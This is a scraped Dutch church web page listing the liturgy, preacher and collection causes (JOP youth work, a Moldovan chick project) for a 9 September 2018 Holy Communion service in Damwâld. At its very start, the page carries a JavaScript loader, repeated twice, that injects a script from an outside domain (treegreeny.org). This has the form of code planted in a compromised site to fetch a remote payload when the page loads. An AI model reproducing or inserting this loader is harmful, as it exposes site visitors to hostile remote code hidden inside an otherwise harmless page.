;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 september 2018 9:30 uur - PKN Damwâld
zondag 9 september 2018
09:30 uur

Kerkdienst zondag 9 september 2018 9:30 uur

Thema: Viering Heilig Avondmaal

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Thema:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Gez.457:1,2 en 4
Welkom en mededelingen
We zingen: ELB 353
Stilgebed, Votum en groet
We zingen: Ps.22: 2 en 4
geloofsbelijdenis .
We zingen: Gez.231:1 en 2
Gebed
We lezen: Num. 20: 2 - 13
Collecte
We zingen: Ps. 99:8
Preek .
We zingen: ELB 308: 2 en 4
Formulier + vragen
Avondmaal .
We zingen: Ps.116: 1 en 6
Gebed
Slotlied : Ps.33: 8
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: JOP

Inspirerende activiteiten voor elke jeugdgroep
Voor jeugdleiders is het telkens weer een grote uitdaging om inspirerende en aantrekkelijke activiteiten te organiseren voor kinderen en jongeren. Goede materialen en werkvormen zijn daarbij van het grootste belang. Dat is wat JOP, Jong Protestant, aanbiedt! Via de website jop.nl zijn honderden materialen en ideeën direct en gratis toegankelijk. Daarnaast zijn er de interactieve spelen Sirkelslag en PaasChallenge. Jeugdwerkers worden ook ondersteund met trainingen op het gebied van catechese, communicatie, geloofsopvoeding en kindernevendienst.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Stichting Mensenkinderen
Babykuikens voor arme gezinnen
Moldavië is het armste land van Europa. De zwakke economie en de slechte omstandigheden in het land maken dat de meerderheid van de inwoners het slecht heeft. Veel ouderen zijn eenzaam en moeten zich zelf maar zien te redden, nadat hun kinderen in het buitenland werk zijn gaan zoeken. Veel kinderen worden bij hun grootouders achtergelaten of groeien op in een één-ouder gezin. Veel arme gezinnen hebben moeite hun kinderen te voeden en om hun rekeningen te betalen. Sommige gezinnen hebben bij hun huis de mogelijkheid dieren te verzorgen zoals kippen, ganzen, geiten enz. Vanwege hun lage inkomen kunnen ze echter geen kleinvee kopen om zodoende hun inkomen te verhogen. Mensenkinderen wil samen met plaatselijke kerken in Moldavië deze gezinnen graag helpen door ze ieder ongeveer 20 kuikens te geven die ze groot kunnen brengen zodat ze later de eieren en het vlees kunnen verkopen en ook weer nieuwe kuikens kunnen fokken. De kuikens zullen op de plaatselijke markt gekocht worden door iemand van de Kerk en ook persoonlijk bij de gezinnen worden afgeleverd. Op deze manier kan de plaatselijke Kerk ook meer betrokken raken bij deze arme gezinnen. Met dit project helpt u mee dat deze families in contact worden gebracht met het geloof en met de liefde van God, en daarnaast ontstaat er op termijn de mogelijkheid inkomsten te gaan verkrijgen door de verkoop van eieren, verkoop van vlees, en het fokken van nieuwe kippen. Voor € 773,00 kunnen 25 geselecteerde arme gezinnen ieder 20 kuikens worden gegeven, en daarmee ook een kans op een betere toekomst.